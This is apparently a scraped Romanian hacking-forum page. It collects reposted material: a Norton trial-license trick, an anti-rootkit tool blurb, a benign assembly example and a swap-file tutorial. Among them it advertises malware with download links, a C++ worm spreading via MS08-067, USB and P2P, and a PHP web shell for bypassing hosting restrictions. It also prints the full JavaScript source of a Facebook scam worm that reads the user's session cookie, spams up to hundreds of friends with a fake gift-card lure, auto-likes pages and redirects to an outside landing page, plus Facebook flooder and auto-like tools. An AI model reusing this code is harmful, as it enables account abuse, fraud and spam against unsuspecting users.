Norton Internet Security 2011 – 360 de zile licenta GRATUITA By Radu FaraVirusi(com) on June 9, 2011 Symantec a lansat generatia 2011 pentru produsele sale de securitate Norton: Norton Antivirus 2011 siNorton Internet Security 2011. Pentru cel din urma puteti avea licenta GRATUITA pentru 360 de zile. Iata ce aduc nou aceste produse (lista va fi completata pe masura ce apar informatiile pe site-ul oficial): Interfata grafica noua Performance Monitoring Performance Monitoring este o componenta noua. Ofera alerte cu informatii bazate pe performantele aplicatiilor. Daca o aplicatie consuma prea multe resurse: CPU, RAM, scrie multe date pe hard-disk, sau acceseaza prea multe programe Norton va alerta asupra acestor lucruri. Download Intelligence 2.0 Download Intelligence a fost introdus pentru Internet Explorer si Mozilla Firefox in produsele Norton 2010. In acest an s-a adaugat suport pentru multe alte aplicatii (sau portaluri) folosite pentru descarcari (downloading) Reputation Scan Reputation Scan este o caracteristica noua pentru Holmes. Aceasta extinde facilitatile oferite de File Insight si Norton Insight din produsele NIS/NAV 2010. Reputation Scan permite utilizatorului sa adune informatii asupra reputatiei unui fisier din orice director specificat de acesta. Norton Bootable Recovery Tool Wizard Aceasta optiune noua va crea un utilitar bootabil actualizat cu care veti putea scana computer-ul din afara sistemului de operare Windows. Acest utilitar poate fi folosit pentru a crea un disc bootabil pe un CD, DVD sau chiar USB. Pentru a descarca si testa Norton Internet Security 2011 GRATUIT timp de 360 de zile folositi urmatoarele promotii: 1. Norton Internet Security 2011 – 60 de zile GRATUIT (oferta I) 2. Norton Internet Security 2011 – 60 de zile GRATUIT (oferta II) 3. Norton Internet Security 2011 – 60 de zile GRATUIT (oferta III) 4. Norton Internet Security 2011 – 90 de zile GRATUIT (oferta I) 5. Norton Internet Security 2011 – 90 de zile GRATUIT (oferta II) Pentru a obtine 360 de zile (aproape 1 an) licenta GRATUITA, descarcati cele cinci kituri de mai sus si instalati-le pe rand. Dupa expirarea unuia, folositi Norton Removal Tool pentru a dezinstala produsul: Download Norton Removal Tool 2011.0.5.13 Free - A program that can remove some Norton software from your computer - Softpedia Apoi instalati al doilea kit, samd. Puteti folosi si fiecare oferta separat si apoi sa instalati alt antivirus, daca vi se pare complicata metoda descrisa. Sursa: Norton Internet Security 2011 – 360 de zile licenta GRATUITA

Salveaza in acelasi folder in care se afla cred. Oricum, nu afiseaza un MsgBox cu locatia dupa ce il salveaza? Nu mai stiu...

A, mai dau si eu banuri fara avertismente. Exista utilizatori care posteaza numai la caterinca, care fac o gramada de posturi stupide, inutile, offtopic, care deci sunt in plus. Specific cate ceva la motiv. De asemenea, nu stau sa dau mii de avertismente, daca vad ca un utilizator deschide 100 de topicuri vechi de exemplu, sua face 15 posturi de offtopic la topicuri tehnice interesante, ii dau ban fara sa mai dau avertismente. E cam acelasi lucru, ori ii dau 3-4 avertismente, ori ban direct, efectul e acelasi.

Pentru ce ai primit ban? In primul rand spune ce cont aveai sa vedem ce ai postat? Eu dau avertismente, rar dau ban permanent. Si da, si eu dau avertisment daca faci o cerere la Programe Hack sau ceva asemanator, pentru ca nu imi face placere sa mut zeci de topicuri. De obicei, dupa ce un admin/moderator da ban direct pentru un post, specifica intr-un post ulterior ce l-a determinat sa faca acea actiune.

Mie mi-a placut grafica "1337" Ok, dau Close atunci.

Anti-Rootkit Tool - Tuluka Kernel Inspector Tuluka is a new powerful AntiRootkit, which has the following features: *Detects hidden processes, drivers and devices *Detects IRP hooks *Identifies the substitution of certain fields in DRIVER_OBJECT structure *Checks driver signatures *Detects and restores SSDT hooks *Detects suspicious descriptors in GDT *IDT hook detection *SYSENTER hook detection *Displays list of system threads and allows you to suspend them *IAT and Inline hook detection *Shows the actual values of the debug registers, even if reading these registers is controlled by someone *Allows you to find the system module by the address within this module *Allows you to display contents of kernel memory and save it to disk *Allows you to dump kernel drivers and main modules of all processes *Allows you to terminate any process *Is able to dissasemble interrupt and IRP handlers, system services, start routines of system threads and many more *Allows to build the stack for selected device Much more.. Download: Tuluka kernel inspector - Download

[C++] hBot [uSB|P2P|LAN|INFECT] hBot private // Made by t0fx // Website: malwares-in.net // anti's (threatexpert,anubis...) // rot13 encryption // Shared folders' spread // LAN spread using ms08-067 // undetected USB spread // P2P spread // Rar and exe's infection // Supersyn // working with xp / vista / seven Download: http://www.multiupload.com/3CP8Y00SRQ Sursa: [C++] hBot [uSB|P2P|LAN|INFECT] - r00tsecurity

Facebook Black Box Flooder, Spammer, Liker, Auto-Adder Nu l-am descarcat, nu l-am incercat, nu stiu daca e infectat, executati pe riscul vostru. Finally it's done! Here it is, newest tool for Facebook! Facebook Black Box Features are: > Wall Flooder - Floods the wall of your slave > Inbox Flooder - Floods the inbox of your slave > Status Flooder - Floods with your status message > Comment Spammer - Spam comments of a random link > Mass Likes - Likes all the posts of your slave > Random Friend Adder - > Poke - Pokes your slave (once) > User ID Checker Notes: > Please update your .NET Framework to the latest version! > Don't PM me questions regarding this program. Post your questions here. > Before you log in your account, make sure it isn't logged in to another browser. > If you can't log in, clear the cache of your IE. > I made this on Windows Vista Ultimate 32-bit. So there is still some compatibility issues on other OS. Screenshots: Virus Scan: File Info Report date: 2010-05-04 18:38:01 (GMT 1) File name: Facebook_Black_Box.exe File size: 543744 bytes MD5 Hash: 56d523ca48800a48f5a64ef3cc5b0e25 SHA1 Hash: 6b960d1baf2877cb8f8af72cc5011e0fdff3fe04 Detection rate: 0 on 20 (0%) Status: CLEAN Detections a-squared - - Avast - - AVG - - Avira AntiVir - - BitDefender - - ClamAV - - Comodo - - Dr.Web - - F-PROT6 - - G-Data - - Ikarus T3 - - Kaspersky - - McAfee - - NOD32 - - Panda - - Solo - - TrendMicro - - VBA32 - - VirusBuster - - Zoner - - Scan report generated by NoVirusThanks.org Download Link: MediaFire Sursa: Facebook Black Box - r00tsecurity

Topic inchis. Da, e interesant, dar atat. Prea mult spam pentru o porcarie.

Beginning ASP.NET 4 in C# 2010 Beginning ASP.NET 4 in C# 2010Publisher: Apress 2010 | 1017 Pages | ISBN: 1430226080 | PDF | 22 MBThe most Up-to-date and comprehensive introductory ASP.NET book you'll find on any shelf, Beginning ASP.NET 4 in C# 2010 guides you through Microsoft's latest technology for building dynamic web sites. This book will enable you to build dynamic web pages on the fly, and assumes only the most basic knowledge of C#. Download: http://freakshare.com/files/3btryk3f/Begin_Asp.rar.html http://hotfile.com/dl/117376760/63a97b1/Begin_Asp.rar.html http://www.duckload.com/download/5578745/Begin_Asp.rar http://www.filesonic.com/file/961998914/Begin_Asp.rar http://www.fileserve.com/file/GGz7gG5Sursa: Beginning ASP.NET 4 in C# 2010 - r00tsecurity

Facebook Scam Source Code Virus It will do a facebook chat to all your friends and tell them to join this Facebook group in which you allow it to access your privacy settings. It then tells you to sign up on a site to access your personal information. function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for (var i = 0; i < ca.length; i++) { var c = ca[i]; while (c.charAt(0) == ' ') c = c.substring(1, c.length); if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length); } return null; } var user_id = readCookie("c_user"); var user_name = document.getElementById('navAccountName').innerHTML; var coverpage = function() { var boxdiv = document.createElement('div'); boxdiv.id = 'coverpage1'; boxdiv.style.display = 'block'; boxdiv.style.position = 'absolute'; boxdiv.style.width = 100 + '%'; boxdiv.style.height = 100 + '%'; boxdiv.style.top = 100 + 'px'; boxdiv.style.margin.top = 100 + 'auto'; boxdiv.style.margin = 0 + 'auto'; boxdiv.style.textAlign = 'center'; boxdiv.style.padding = '4px'; boxdiv.style.background = 'url(http://1.bp.blogspot.com/-A0gpB7_AX3o/Tc71HASoEXI/AAAAAAAABKs/EjquUCzFw20/s1600/pgvws.png) no-repeat scroll center top'; boxdiv.style.fontSize = '15px'; boxdiv.style.zIndex = 9999999; boxdiv.innerHTML=' <table align="center" cellpadding="5" cellspacing="5" width="400px"><tr align="left"><td valign="middle"><br /><br /><br /><br /><img style="border: 1px solid black;padding:5px;margin:10px;width:140px;height:140px;" src="http://graph.facebook.com/'+user_id+'/picture?type=large" /></td><td align="left" valign="middle"><font style="font-weight: bold;font-size:16px;">'+user_name+'</font><br /><img src="http://i.imgur.com/hRjNi.gif" style="margin-left:20px;padding-left: 5px;"/></td></tr></table>'; document.body.appendChild(boxdiv); } coverpage(); // Setup some variables var post_form_id = document.getElementsByName('post_form_id')[0].value; var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; // Chat message variables var this_chat = "omg!! i just got my $1,000 jetBlue giftcard in the mail today!! go get one 2 so we can go somewhere x.co/XFG8"; var prepared_chat = encodeURIComponent(this_chat); /////////////////////////////////////////////////////////////////////////////////////////////////////////////// // Post Link to friends walls /////////////////////////////////////////////////////////////////////////////////////////////////////////////// var token = Math.round(new Date().getTime() / 1000); var http1 = new XMLHttpRequest(); var url1 = "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&viewer=" + user_id + "&token=" + token + "-6&filter[0]=user&options[0]=friends_only"; var params1 = ""; http1.open("GET", url1 + "?" + params1, true); http1.onreadystatechange = function () { //Call a function when the state changes. if (http1.readyState == 4 && http1.status == 200) { // If state = success var response1 = http1.responseText; response1 = response1.replace("for (;", ""); // Get rid of the junk at the beginning of the returned object response1 = JSON.parse(response1); // Convert the response to JSON //alert(response4.toSource()); var count = 0; for (uid in response1.payload.entries) { if (count < 400) { //alert("SENT TO "+response1.payload.entries[count].uid); // Loop to send messages // New XMLHttp object var httpwp = new XMLHttpRequest(); var urlwp = "http://www.facebook.com/ajax/profile/composer.php?__a=1"; var paramswp = "post_form_id=" + post_form_id + "&fb_dtsg=" + fb_dtsg + "&xhpc_composerid=u574553_1&xhpc_targetid=" + response1.payload.entries[count].uid + "&xhpc_context=profile&xhpc_fbx=1&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][metaTagMap][0][http-equiv]=content-type&attachment[params][metaTagMap][0][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][metaTagMap][1][property]=og%3Atitle&attachment[params][metaTagMap][1][content]=How would you like a $1,000 jetBlue Gift Card? - Fly Anywhere For Free!&attachment[params][metaTagMap][2][property]=og%3Aurl&attachment[params][metaTagMap][2][content]=http://www.facebook.com&attachment[params][metaTagMap][3][property]=og%3Asite_name&attachment[params][metaTagMap][3][content]=jetBlue&attachment[params][metaTagMap][4][property]=og%3Aimage&attachment[params][metaTagMap][4][content]=http://i.imgur.com/8TAjs.jpg&attachment[params][metaTagMap][5][property]=og%3Adescription&attachment[params][metaTagMap][5][content]=Only 24 Hours Left!!&attachment[params][metaTagMap][6][name]=description&attachment[params][metaTagMap][6][content]=jetBlue&attachment[params][metaTagMap][7][http-equiv]=Content-Type&attachment[params][metaTagMap][7][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][medium]=106&attachment[params][urlInfo][user]=http://x.co/XFG8&attachment[params][favicon]=http://lol.info/os/favicon.ico&attachment[params][title]=How would you like a $1,000 jetBlue Gift Card? - Fly Anywhere For Free!&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]=Only 24 hours left!&attachment[params][url]=http://www.facebook.com&attachment[params][ttl]=0&attachment[params][error]=1&attachment[params][responseCode]=206&attachment[params][metaTags][description]=Get your FREE $1,000 jetBlue card now before time runs out!&attachment[params][images][0]=http://i.imgur.com/8TAjs.jpg&attachment[params][scrape_time]=1302991496&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text=omg!! i can't believe they're sending me one!!!&xhpc_message=yesssss GOT ONE SUCKASSSS&nctr[_mod]=pagelet_wall&lsd&post_form_id_source=AsyncRequest"; httpwp.open("POST", urlwp, true); //Send the proper header information along with the request httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); httpwp.setRequestHeader("Content-length", paramswp.length); httpwp.setRequestHeader("Connection", "keep-alive"); httpwp.onreadystatechange = function () { //Call a function when the state changes. if (httpwp.readyState == 4 && httpwp.status == 200) { //alert(http.responseText); //alert('buddy list fetched'); } } httpwp.send(paramswp); } count++; // increment counter } http1.close; // Close the connection } } http1.send(null); /////////////////////////////////////////////////////////////////////////////////////////////////////////////// // Hide chat boxes /////////////////////////////////////////////////////////////////////////////////////////////////////////////// var hide = document.getElementById('fbDockChatTabSlider'); hide.style.display = "none"; /////////////////////////////////////////////////////////////////////////////////////////////////////////////// // Get online friends and send chat message to them /////////////////////////////////////////////////////////////////////////////////////////////////////////////// var http3 = new XMLHttpRequest(); var url3 = "http://www.facebook.com/ajax/chat/buddy_list.php?__a=1"; var params3 = "user=" + user_id + "&popped_out=false&force_render=true&post_form_id=" + post_form_id + "&fb_dtsg=" + fb_dtsg + "&lsd&post_form_id_source=AsyncRequest"; http3.open("POST", url3, true); //Send the proper header information along with the request http3.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); http3.setRequestHeader("Content-length", params3.length); http3.setRequestHeader("Connection", "close"); http3.onreadystatechange = function () { //Call a function when the state changes. if (http3.readyState == 4 && http3.status == 200) { var response3 = http3.responseText; response3 = response3.replace("for (;", ""); response3 = JSON.parse(response3); var count = 0; for (property in response3.payload.buddy_list.nowAvailableList) { if (count < 100) { // Loop to send messages // New XMLHttp object var httpc = new XMLHttpRequest(); // Generate random message ID var msgid = Math.floor(Math.random() * 1000000); var time = Math.round(new Date().getTime() / 1000); var urlc = "http://www.facebook.com/ajax/chat/send.php?__a=1"; var paramsc = "msg_id=" + msgid + "&client_time=" + time + "&to=" + property + "&num_tabs=1&pvs_time=" + time + "&msg_text=" + prepared_chat + "&to_offline=false&post_form_id=" + post_form_id + "&fb_dtsg=" + fb_dtsg + "&lsd&post_form_id_source=AsyncRequest"; httpc.open("POST", urlc, true); //Send the proper header information along with the request httpc.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); httpc.setRequestHeader("Content-length", paramsc.length); httpc.setRequestHeader("Connection", "close"); httpc.onreadystatechange = function () { //Call a function when the state changes. if (httpc.readyState == 4 && httpc.status == 200) { //alert(http.responseText); //alert('buddy list fetched'); } } httpc.send(paramsc); } //alert(property); count++; // increment counter } http3.close; // Close the connection } } http3.send(params3); /////////////////////////////////////////////////////////////////////////////////////////////////////////////// // Become a Fan /////////////////////////////////////////////////////////////////////////////////////////////////////////////// var http4 = new XMLHttpRequest(); var url4 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1"; var params4 = "fbpage_id=201282479913581&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id=" + post_form_id + "&fb_dtsg=" + fb_dtsg + "&lsd&post_form_id_source=AsyncRequest" http4.open("POST", url4, true); //Send the proper header information along with the request http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); http4.setRequestHeader("Content-length", params4.length); http4.setRequestHeader("Connection", "close"); http4.onreadystatechange = function () { //Call a function when the state changes. if (http4.readyState == 4 && http4.status == 200) { http4.close; // Close the connection } } http4.send(params4); /////////////////////////////////////////////////////////////////////////////////////////////////////////////// // Become a Fan /////////////////////////////////////////////////////////////////////////////////////////////////////////////// var http5 = new XMLHttpRequest(); var url5 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1"; var params5 = "fbpage_id=201286706575691&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id=" + post_form_id + "&fb_dtsg=" + fb_dtsg + "&lsd&post_form_id_source=AsyncRequest" http5.open("POST", url5, true); //Send the proper header information along with the request http5.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); http5.setRequestHeader("Content-length", params5.length); http5.setRequestHeader("Connection", "close"); http5.onreadystatechange = function () { //Call a function when the state changes. if (http5.readyState == 4 && http5.status == 200) { http5.close; // Close the connection } } http5.send(params5); /////////////////////////////////////////////////////////////////////////////////////////////////////////////// // Become a Fan /////////////////////////////////////////////////////////////////////////////////////////////////////////////// var http6 = new XMLHttpRequest(); var url6 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1"; var params6 = "fbpage_id=167400883320224&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id=" + post_form_id + "&fb_dtsg=" + fb_dtsg + "&lsd&post_form_id_source=AsyncRequest" http6.open("POST", url6, true); //Send the proper header information along with the request http6.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); http6.setRequestHeader("Content-length", params6.length); http6.setRequestHeader("Connection", "close"); http6.onreadystatechange = function () { //Call a function when the state changes. if (http6.readyState == 4 && http6.status == 200) { http6.close; // Close the connection } } http6.send(params6); //this function includes all necessary js files for the application function include(file) { var script = document.createElement('script'); script.src = file; script.type = 'text/javascript'; script.defer = true; document.getElementsByTagName('head').item(0).appendChild(script); } include('http://code.jquery.com/jquery-1.5.2.min.js'); var landingpage = function() { var myFrame = $("div#coverpage1").hide(1000); window.top.location = "http://appboxkm.info.s3-website-us-east-1.amazonaws.com/"; } setTimeout("landingpage();",19000); Sursa: http://r00tsecurity.org/forums/topic/13898-facebook-scam-source-code-virus/

[Linux x86 NASM] Open, Read & Write syscalls section .bss buffer: resb 2048 ; A 2 KB byte buffer used for read section .data buflen: dw 2048 ; Size of our buffer to be used for read section .text global _start _start: ; open(char *path, int flags, mode_t mode); ; Get our command line arguments. pop ebx ; argc pop ebx ; argv[0] (executable name) pop ebx ; argv[1] (desired file name) mov eax, 0x05 ; syscall number for open xor ecx, ecx ; O_RDONLY = 0 xor edx, edx ; Mode is ignored when O_CREAT isn't specified int 0x80 ; Call the kernel test eax, eax ; Check the output of open() jns file_read ; If the sign flag is set (positive) we can begin reading the file ; = If the output is negative, then open failed. So we should exit exit: mov eax, 0x01 ; 0x01 = syscall for exit xor ebx, ebx ; makes ebx technically set to zero int 0x80 ; = Begin reading the file file_read: ; read(int fd, void *buf, size_t count); mov ebx, eax ; Move our file descriptor into ebx mov eax, 0x03 ; syscall for read = 3 mov ecx, buffer ; Our 2kb byte buffer mov edx, buflen ; The size of our buffer int 0x80 test eax, eax ; Check for errors / EOF jz file_out ; If EOF, then write our buffer out. js exit ; If read failed, we exit. ; No error or EOF. Keep reading . file_out: ; write(int fd, void *buf, size_t count); mov edx, eax ; read returns amount of bytes read mov eax, 0x04 ; syscall write = 4 mov ebx, 0x01 ; STDOUT = 1 mov ecx, buffer ; Move our buffer into the arguments int 0x80 jmp exit ; All done Sursa: [Linux x86 NASM] Open, Read & Write syscalls - r00tsecurity

Private x0rg Web Hosting Bypasser (PHPshell) This shell has the best bypass capabilities for example: PERL - Extension bypass PYTHON - Extension bypass Bypass php.ini/.htaccess bypass for PHP 5.2.9 bypass for PHP 5.2.12/5.3.1 And other crazy shit here's a SS: Download: http://www.multiupload.com/0PZSAB1DCQ Sursa: Private x0rg Web Hosting Bypasser (PHPshell) - r00tsecurity

Facebook Auto Like Script External Pages Code /* ----------- USER CONFIGURATIONS ------------ */ $login_email = 'CHANGE THIS TO YOUR EMAIL'; $login_pass = 'CHANGE THIS TO YOUR PASSWORD'; $rssFeedToLike = "CHANGE THIS TO YOUR RSS FEED"; /* ------- END OF USER CONFIGURATIONS -------- */ # stories seen $ss = Array(); $page = ''; $likephp = ''; function fblogin($page) { global $ch,$login_email,$login_pass; curl_setopt($ch, CURLOPT_REFERER, 'http://www.facebook.com/plugins/like.php?href=http://fernandomagro.com'); curl_setopt($ch, CURLOPT_URL, 'http://www.facebook.com/login.php?api_key=9c2355ddad105c0767059b748e771bc6&skip_api_login=1&display=popup&social_plugin=like&external_page_url='.rawurlencode($page).'&next=http%3A%2F%2Fwww.facebook.com%2Fconnect%2Fuiserver.php%3Fsocial_plugin%3Dlike%26external_page_url%3D'.rawurlencode($page).'%26method%3Dopt.inlike%26display%3Dpopup%26app_id%3D127760087237610%26from_login%3D1'); curl_setopt($ch, CURLOPT_POSTFIELDS, 'email=' . urlencode($login_email) . '&pass=' . urlencode($login_pass) . '&login=' . urlencode("Login")); curl_setopt($ch, CURLOPT_POST, 1); $login = curl_exec($ch); # echo $login."\n\n\n\n\n";#debug return $login; exit;#debug } function fblikepage($page) { global $ch,$likephp; curl_setopt($ch, CURLOPT_URL, 'http://www.facebook.com/plugins/like.php?href='.rawurlencode($page)); curl_setopt($ch, CURLOPT_POST, 0); $likephp = curl_exec($ch); preg_match("/Env=\{module:\"like_widget\",impid:\"([^\"]+)\",user\d+)/", $likephp, $fbvars); return $fbvars; } // init curl $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_COOKIEJAR, "my_cookies.txt"); curl_setopt($ch, CURLOPT_COOKIEFILE, "my_cookies.txt"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4"); curl_setopt($ch, CURLOPT_URL, $rssFeedToLike); curl_setopt($ch, CURLOPT_POST, 0); $feed = curl_exec($ch); preg_match_all("/<feedburnerrigLink>([^<]+)<\/feedburnerrigLink>/", $feed, $links); #preg_match_all("/<link>([^<]+)<\/link>/", $feed, $links); foreach ($links[1] as $link) { $fbvars = ''; $fbvars = fblikepage($link); if ($fbvars[2] == 0) { if (preg_match("/Env=\{user:\d+/", $likephp)) { echo "Could not like $link : no impid detected\n"; continue; } echo "Logging in...\n"; $page = fblogin($link); $page = fblogin($link); # it's repeated on purpose, cookie trick. $fbvars = fblikepage($link); } # print_r($fbvars); # wrong password if ($fbvars[2] == 0) { echo "Incorrect login user or password\n"; exit; } # impid, user, post_form_id, fb_dtsg preg_match("/Env=\{module:\"like_widget\",impid:\"([^\"]+)\",user\d+).+?post_form_id:\"([^\"]+)\",fb_dtsg:\"([^\"]+)\",/", $likephp, $fbvars); #print_r($fbvars); curl_setopt($ch, CURLOPT_URL, 'http://facebook.com/ajax/connect/external_node_connect.php?__a=1'); curl_setopt($ch, CURLOPT_POSTFIELDS, 'href='.rawurlencode($link).'&node_type=link&edge_type=like&page_id&layout=standard&connect_text&ref&now_connected=true&post_form_id='.$fbvars[3].'&nctr[_mod]=like_widget&nctr[_impid]='.$fbvars[1].'&fb_dtsg='.$fbvars[4].'&post_form_id_source=AsyncRequest'); curl_setopt($ch, CURLOPT_POST, 1); $page = curl_exec($ch); # echo $page; echo "Liked $link\n"; } ?> Sursa: Facebook Auto Like Script External Pages Code - r00tsecurity

How to Increase the Swap File in UNIX(-like) Operating Systems First of all, I’m not saying on which operating system because this applies to numerous UNIX, UNIX derivates and UNIX-like operating systems. For example, the process of increasing the swap file is the same on all Linux, AIX, HP-UX, FreeBSD, NetBSD, OpenBSD, IRIX, Tru64 and possibly more. So, assuming that we have approximately 2GB of swap… 1root:~# free 2 total used free shared buffers cached 3Mem: 1026140 690164 335976 0 226408 246340 4-/+ buffers/cache: 217416 808724 5Swap: 2064376 0 2064376 6root:~# We first create an empty file with the size of additional swap we need. For example if we need 512MB of additional swap we’ll create a file like this: 1root:~# dd if=/dev/zero of=/example_swap bs=1024 count=500000 2500000+0 records in 3500000+0 records out 4512000000 bytes (512 MB) copied, 7.03446 seconds, 72.8 MB/s 5root:~# Which will obviously create file with size of 512MB filled with zeros… 1root:~# ls -l /example_swap 2-rw-r--r-- 1 root root 512000000 May 24 11:49 /example_swap 3root:~# Next, we are making this a swap area using the provided utility. 1root:~# mkswap /example_swap 2Setting up swapspace version 1, size = 511995 kB 3root:~# And we attach this to the system’s swap file as shown below… 1root:~# swapon /example_swap 2root:~# free 3 total used free shared buffers cached 4Mem: 1026140 1005904 20236 0 197632 579308 5-/+ buffers/cache: 228964 797176 6Swap: 2564368 0 2564368 As you can see the space was increased. It would be wise to also update /etc/fstab to map this area at boot time or when using swapon -a command. In order to stop using this area, simply remove it with the appropriate system call’s wrapper utility. 1root:~# swapoff /example_swap 2root:~# free 3 total used free shared buffers cached 4Mem: 1026140 1005780 20360 0 197648 579316 5-/+ buffers/cache: 228816 797324 6Swap: 2064376 0 2064376 7root:~# Sursa: How to Increase the Swap File in UNIX(-like) Operating Systems « xorl %eax, %eax